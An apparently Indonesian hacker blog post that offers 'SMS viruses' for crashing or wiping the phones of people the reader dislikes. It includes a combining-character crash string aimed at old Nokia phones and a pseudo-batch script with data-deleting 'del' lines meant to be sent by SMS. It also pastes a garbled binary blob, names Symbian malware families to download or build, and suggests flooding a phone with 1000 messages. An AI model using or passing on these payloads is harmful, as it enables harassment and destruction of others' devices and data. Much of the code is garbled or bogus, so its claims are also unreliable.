kumpulan sms virus


hai temen-temen sahabat hacker sering kali ada orang yang kita gak suka di dunia ini.betul????
trus buat yang sering di kerjain di hp jangan kawatir ada cara buat hancurin tu hp.
cara 1 pake flood(virus sms):
virus 1

bekeja pada hp yang gak ada cameranya hp layar kecil, contoh : nokia 1209 , nokia 1208 , dan seri yg dibawahnya bisa hp selain nokia dan juga bisa hp yang tidak berwarna alias monokrom efeknya bisa me restart hp tersebut


̲̲̲̲̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅ ̲̲̲̲̲̲̲̲̲̅̅̅̅̅̅̅̅̅0




virus 2
bekerja pada hp kamera,,seperti nokia 2700,nokia 6300,sony erisson G502,efeknya ngeformat data........yang ada di dalam hp tersebut........seperti foro dan lagy lagu.awalnya sih nge restart.

@system
echo>>restart
echo>>del :C
echo>>del:E
echo>>error
cls
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ——————————————————-
echo =============
echo =============
echo =============
echo ——————————————————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
scrip atau kode kode tersebut copy ke sms kamu jadi kita kirim virus tersebut lewat sms.he..he...
kalo gak berhasil pake cara lain

Virus 3
?????:??????$O…s:???????????C???È???????????????d???f???&???????:???????:???????a?????????????????????????????????z???B???d???¼??? ???.???Ë??????? ???????????????j??? ???T???è???@???Î???5???????Þ???????????????j???Þ???T???H???_???????a???????ś???????????????`???ś???????ü???S???m???\???????ü???^o??????????"???ü???????????C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?P?o?p?U?p?0?.?t?x?t?S?e?r?i?e?s?6?0?P?r?o?d?u?c?t?I?D?m?m?f?a?d?d?o?n?xś%Ť±?ƒ0?Dw$þá¶è¥C‡n??¨Bj;Сsè?±Hbä?¤þ}?õxwïùf¶ ¸@?=¥U?dÄt"IÐ?Möś¯,®ð?'…3ëô?5p'öýB²8,Q _??ÆìKûX3õáÜ-V?Å?÷4žv,ú¬? Ìì?)8âXt'ç0ä?V??~ Y§ØX×^ºªª²x±<Ψqo?mßý?o¦Aäxś?5?ÊÿËåäè äæåíòåëüìåíû, ê âàøåìó âíèìàíèþ - íîâûé âèðóñ...\ 'PxśÌA ƒ@??нà?þ®x?-R(]yƒ@ÒN`š'ùQñöõ?ï½Mõz??è-EZ­??âÓ:~ûæèy?‡§?Ñàĺ".³u…?²K°J?²aëou?xÞ#<çmÿ^¡!ÝxśóeðepcP`HdH?B?†?†| Y   $K?èE¬` ;-!ë!?¨"?È7gÐc0`(fP?²"Er ťE@]™?Ù?†@?? ^5ƒ&?/????¸Tº


Hp china

cara 2:

virus buat hp symbian

ngirimnya pake MMS
kalo virus ini enaknya sih bikin sendiri aja tapi kalo gak bisa bisa juga download untuk lebih lengkapnya baca di posting di bawah ini.
membuat virus hp symbian

COMMWARRIOR

SKULL

CABIR

MABIR

MGDROPPER


cara 3:mengirim 1000 sms sekaligus

bayangin 1 hape kalo dapet sms banyak banget ampe 1000,2000 dll,tekor gak tuh????
pasti hpnya broken deh..he...he silakan pindah link

klik disini




dosa tanggung sendiri ok!!!!!!by:akbar rafsan

1 komentar:

1

mengatakan...

nah tu nophe kita ketauan g di hp yg dikirimin virus ?

Poskan Komentar